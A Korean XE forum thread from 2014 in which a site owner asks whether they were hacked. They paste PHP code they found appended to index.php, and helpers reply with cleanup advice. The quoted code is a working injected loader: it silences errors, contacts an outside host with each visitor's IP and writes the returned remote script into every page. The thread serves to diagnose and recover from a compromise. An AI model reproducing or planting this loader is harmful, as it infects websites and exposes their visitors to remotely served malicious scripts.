묻고답하기
XE 해킹일까요?
2014.04.24 21:55
index.php파일 최하단에
#af7fbf#
if (empty($sehbv)) {
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents')) {
function __url_get_contents($remote_url, $timeout)
{
if (function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
} elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents')) {
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
$remote_url, $matches)
) {
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http") {
$socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
} else {
// Bad protocol
return FALSE;
}
if (!$socket) {
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request)) {
// Error sending request
return FALSE;
}
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain)) {
$_ip = $_SERVER['REMOTE_ADDR'];
$sehbv = "http://www.processnet.com.ar/good_job/yWXjwvJc.php";
$sehbv = __url_get_contents($sehbv."?a=$_ip", 1);
if (strpos($sehbv, 'http://') === 0) {
$__var_to_echo = '<script type="text/javascript" src="' . $sehbv . '?id=12328198"></script>';
echo $__var_to_echo;
}
}
}
#/af7fbf#
사이트 접속이 되다 말다 그러고 페이지를 찾을 수 없습니다 빈도가 상당히 잦아 서버를 재부팅 해봤으나 증상은 동일하여 FTP를 열었더니..
위와같은 소스가 들어있었습니다.
업로드 한적이 없었음에도 불구하고 위의 소스가 들어가있고
업로드시간은 4월 24일 5시 40분 자로 표시되어있네요..
다시 원래 XE 의 기본 php 파일을 올렸으나 속도 문제는 해결 되지 않네요.
무섭습니다. 어떻게 해야할까요?
댓글 13
-
KrteamENT
2014.04.24 22:00
-
db config 파일에는
'use_cdn' => 'N',
'use_html5' => 'N',
'admin_ip_list' =>
array (
0 => ,
1 => ,
2 => .*',
),
'use_prepared_statements' => 'Y',
'sitelock_whitelist' =>
array (
0 => ,
1 => ,
2 => ,
),
'use_sitelock' => 'N',
'sitelock_title' => 'Maintenance in progress...',
'sitelock_message' => NULL,
'embed_white_object' =>
array (
0 => '//www.youtube-nocookie.com/',
1 => '//www.youtube.com/embed/',
2 => '//www.youtube.com/v/',
3 => 'http://api.v.daum.net/',
4 => 'http://blogdoc.nate.com/flash/blogdoc_widget_reco.swf',
5 => 'http://dbi.video.cyworld.com/v.sk/',
6 => 'http://doc.mgoon.com/player/',
7 => 'http://dory.mncast.com/mncHMovie.swf',
8 => 'http://dory.mncast.com/mncastPlayer.swf',
9 => 'http://event.dn.naver.com/sbsplayer/vmplayer.xap',
10 => 'http://flvr.pandora.tv/flv2pan/',
11 => 'http://flvs.daum.net/flvPlayer.swf',
12 => 'http://imgcdn.pandora.tv/gplayer/flJal.swf',
13 => 'http://imgcdn.pandora.tv/gplayer/pandora_EGplayer.swf',
14 => 'http://musicplayer.naver.com/naverPlayer/posting/',
15 => 'http://netv.sbs.co.kr/sbox/silverlight/ClientBin/NeTVPlayer.xap',
16 => 'http://news.sbs.co.kr/',
17 => 'http://onemore.imbc.com/ClientBin/oneplus.xap',
18 => 'http://play.mgoon.com/Game/',
19 => 'http://play.mgoon.com/Photo/',
20 => 'http://play.mgoon.com/Video/',
21 => 'http://play.tagstory.com/player/',
22 => 'http://player.music.naver.com/naverPlayer/posting/',
23 => 'http://sbsplayer.sbs.co.kr/',
24 => 'http://scrap.ad.naver.com/',
25 => 'http://serviceapi.nmv.naver.com/',
26 => 'http://static.campaign.naver.com/0/campaign/2010/10/socialsearch/swf/',
27 => 'http://tvpot.daum.net/playlist/playlist.swf',
28 => 'http://v.egloos.com/v.sk/',
29 => 'http://v.nate.com/v.sk/',
30 => 'http://vmark.kbs.co.kr/zzim/vmplayer/vmplayer.xap',
31 => 'http://w.blogdoc.nate.com/',
32 => 'http://wizard2.sbs.co.kr/',
33 => 'http://www.kbs.co.kr/zzim/vmplayer/vmplayer.xap',
34 => 'http://www.tagstory.com/player/basic/',
35 => 'http://www.youtube-nocookie.com/',
36 => 'http://www.youtube.com/v/',
),
'embed_white_iframe' =>
array (
0 => '//www.youtube-nocookie.com/',
1 => '//www.youtube.com/embed/',
2 => '//www.youtube.com/v/',
3 => 'http://flvs.daum.net/',
4 => 'http://maps.google.co.kr/',
5 => 'http://maps.google.com/',
6 => 'http://player.vimeo.com/',
7 => 'http://sbsplayer.sbs.co.kr/',
8 => 'http://www.youtube-nocookie.com/',
9 => 'http://www.youtube.com/',
10 => 'https://www.youtube-nocookie.com/',
11 => 'https://www.youtube.com/',
),
);
가들어가있네요. -
KrteamENT
2014.04.24 22:02
IP는 확인하시고 여과후 올려주세요 여차저차하면 IP로 해킹을 할수도 있는지라..ㅎㅎ;;
우선 이파일은 정상입니다.
-
이상한 점은 이 dbconfig 파일까지 수정일이 오늘 오후 4시 20분이네요... 전분명 ftp 접속한적도 없는데 어떻게 해결해야할까요 ㅠㅠ
-
KrteamENT
2014.04.24 22:05
호스팅업체에 해당 시간전에 즉, 전일에 수정하신게 없으면 그전날본으로 백업해달라고 해주시구요.
설마 그걸로 돈받아먹을 회사가 왠만해서 없기에...ㅋㅋ;;;
우선 백업을 그걸로 하시면 될듯합니다. (DB는 빼고 해달라고 해주세요. DB까지하면 글까지 그날로 돌아가서리.. )
-
답변감사합니다.
호스팅이아니고 제개인서버에 운영하느거라 백업을 안해두었는데 난감하네요 으아 ㅠㅠ
-
KrteamENT
2014.04.24 22:06
음 그러면 여태중에 별도 수정한거 있나요?
-
수정한것 없습니다2월에 5.3php 서버에서 5.4 서버로 옮긴것 말고는
그파일로 싹 덮어버리는게좋을까요 DB 쪽은 침범하지 않았겠죠?
-
KrteamENT
2014.04.24 22:08
우선은 모르지만 그냥 덮어버리세요.
DB까지 건들었다면.......흠..
-
실례지만 인젝션해킹에 대해 여쭤 봐도 될까요?
-
KrteamENT
2014.04.24 22:11
http://ko.wikipedia.org/wiki/SQL_%EC%82%BD%EC%9E%85 -
<?php if(!defined("__XE__")) exit();
$db_info = (object)array (
'time_zone' => '+0900',
'use_rewrite' => 'Y',
'use_optimizer' => 'Y',
'qmail_compatibility' => 'N',
'default_url' => 'http://www.주소',
'use_db_session' => 'Y',
'use_ssl' => 'none',
'use_sso' => 'N',
'use_mobile_view' => 'Y',
'master_db' =>
array (
'db_type' => 'mysql',
'db_port' => '3306',
'db_hostname' => 'localhost',
'db_password' => '암호',
'db_database' => '디비명',
'db_userid' => '아이디',
'db_table_prefix' => 'xe_',
),
'slave_db' =>
array (
0 =>
array (
'db_type' => 'mysql',
'db_port' => '3306',
'db_hostname' => 'localhost',
'db_password' => '암호',
'db_database' => '디비명',
'db_userid' => '아이디',
'db_table_prefix' => 'xe_',
),
),
'use_cdn' => 'N',
'use_html5' => 'N',
'admin_ip_list' =>
array (
0 => '127.0.0.1',
1 => '아이피',
2 => '아이피',
),
'use_prepared_statements' => 'Y',
'sitelock_whitelist' =>
array (
0 => '127.0.0.1',
1 => '아이피',
2 => '아이피',
),
'use_sitelock' => 'N',
'sitelock_title' => 'Maintenance in progress...',
'sitelock_message' => NULL,
'embed_white_object' =>
array (
0 => '//www.youtube-nocookie.com/',
1 => '//www.youtube.com/embed/',
2 => '//www.youtube.com/v/',
3 => 'http://api.v.daum.net/',
4 => 'http://blogdoc.nate.com/flash/blogdoc_widget_reco.swf',
5 => 'http://dbi.video.cyworld.com/v.sk/',
6 => 'http://doc.mgoon.com/player/',
7 => 'http://dory.mncast.com/mncHMovie.swf',
8 => 'http://dory.mncast.com/mncastPlayer.swf',
9 => 'http://event.dn.naver.com/sbsplayer/vmplayer.xap',
10 => 'http://flvr.pandora.tv/flv2pan/',
11 => 'http://flvs.daum.net/flvPlayer.swf',
12 => 'http://imgcdn.pandora.tv/gplayer/flJal.swf',
13 => 'http://imgcdn.pandora.tv/gplayer/pandora_EGplayer.swf',
14 => 'http://musicplayer.naver.com/naverPlayer/posting/',
15 => 'http://netv.sbs.co.kr/sbox/silverlight/ClientBin/NeTVPlayer.xap',
16 => 'http://news.sbs.co.kr/',
17 => 'http://onemore.imbc.com/ClientBin/oneplus.xap',
18 => 'http://play.mgoon.com/Game/',
19 => 'http://play.mgoon.com/Photo/',
20 => 'http://play.mgoon.com/Video/',
21 => 'http://play.tagstory.com/player/',
22 => 'http://player.music.naver.com/naverPlayer/posting/',
23 => 'http://sbsplayer.sbs.co.kr/',
24 => 'http://scrap.ad.naver.com/',
25 => 'http://serviceapi.nmv.naver.com/',
26 => 'http://static.campaign.naver.com/0/campaign/2010/10/socialsearch/swf/',
27 => 'http://tvpot.daum.net/playlist/playlist.swf',
28 => 'http://v.egloos.com/v.sk/',
29 => 'http://v.nate.com/v.sk/',
30 => 'http://vmark.kbs.co.kr/zzim/vmplayer/vmplayer.xap',
31 => 'http://w.blogdoc.nate.com/',
32 => 'http://wizard2.sbs.co.kr/',
33 => 'http://www.kbs.co.kr/zzim/vmplayer/vmplayer.xap',
34 => 'http://www.tagstory.com/player/basic/',
35 => 'http://www.youtube-nocookie.com/',
36 => 'http://www.youtube.com/v/',
),
'embed_white_iframe' =>
array (
0 => '//www.youtube-nocookie.com/',
1 => '//www.youtube.com/embed/',
2 => '//www.youtube.com/v/',
3 => 'http://flvs.daum.net/',
4 => 'http://maps.google.co.kr/',
5 => 'http://maps.google.com/',
6 => 'http://player.vimeo.com/',
7 => 'http://sbsplayer.sbs.co.kr/',
8 => 'http://www.youtube-nocookie.com/',
9 => 'http://www.youtube.com/',
10 => 'https://www.youtube-nocookie.com/',
11 => 'https://www.youtube.com/',
),
);이소스는 변경되지 않은것인가요?
분명 5시 22분에 수정되었다고나오는데 뭔가가 고쳐졌을것 같습니다. ㅠㅠ
-
KrteamENT
2014.04.24 22:27
뭐,,딱히 변한건 없어보이는데요??
| 글쓴이 | 제목 | 최종 글 |
|---|---|---|
| XE | 공지 글 쓰기,삭제 운영방식 변경 공지 [16] | 2019.03.05 by 남기남 |
| 쉬폰케익 | 닷홈 무료 호스팅을 신청했는데요 주소가.. [4] | 2015.02.27 by 라디오스테이션 |
| 게르병이 |
xe보드 설치시 에러
[8]
 | 2015.02.27 by 게르병이 |
| 큰성565 | 시험모듈의 카테고리를 cond 이용해서 레이아웃쪽으로 떼어내려고 하는데요. | |
| 홈런볼11 | mysql 일괄 처리 명령어 | |
| 불금 | 회원가입시 영어+숫자 라고 되어있는데요. [1] | 2015.02.26 by 불금 |
| 기을이 | 로그인했는데 자동 로그아웃되는 현상 [1] | 2015.02.26 by Hi_Roy |
| ljhw | 도움주실분ㅠ [4] | 2015.02.26 by ljhw |
| 헌팅 |
도와주세요.
| |
| kjmedi626 |
서브페이지 질문드려요.
| |
| 착한부산남자 | 리눅스 메일 보내기(파일첨부포함) 쉘스크립트를 알고 싶어요 | |
| 유샤인 |
새버전 1.7.11으로 업그레이드하고 생긴 이 문제 해결책 좀 부탁합니다.
[1]
| 2015.02.26 by 유샤인 |
| 홈런볼11 | 입력 형식 체크 하는 부분 [3] | 2015.02.26 by 홈런볼11 |
| 스풀링 | 스케치북5 게시판 가로사이즈 조절 질문좀드려요~ [2] | 2015.02.26 by 스풀링 |
| 재리빠 |
네이버검색, 세션아이디, 중복문서 문의드립니다.
| |
| 랩소 |
admin 업데이트 관련
[4]
| 2015.02.26 by 랩소 |
| kjmedi626 |
질문합니다 ㅠㅠ
[4]
| 2015.02.26 by kjmedi626 |
| 너구리우동면 | 링크페이지 ftp는 링크할수있는 방법이 어떤게 있을까요? | |
| 스누피12 |
관리자 로그인이 안됩니다(존재하지 않는 회원아이디)
[7]
| 2015.02.26 by 스누피12 |
| 지고흐 | 스케치북5 씁니다. 게시글 사진이 늘어져나와요 ㅜㅜ [12] | 2015.02.26 by 지고흐 |
| 취침 |
게시판 모듈 삭제는 어떻게 하나요?ㅠㅠ
[2]
| 2015.02.26 by 취침 |
아마도 인젝션 해킹인듯 합니다.
XE에서 DB인젝션으로 뚫어버리면 속수무책..으로 알고 있거든요.
우선 index.php 수정하신거 원본으로 돌리시구요.
나머지 최근에 수정하신거 없는데 수정된거 역시 수정되기전 파일로 바꾸어주시면됩니다.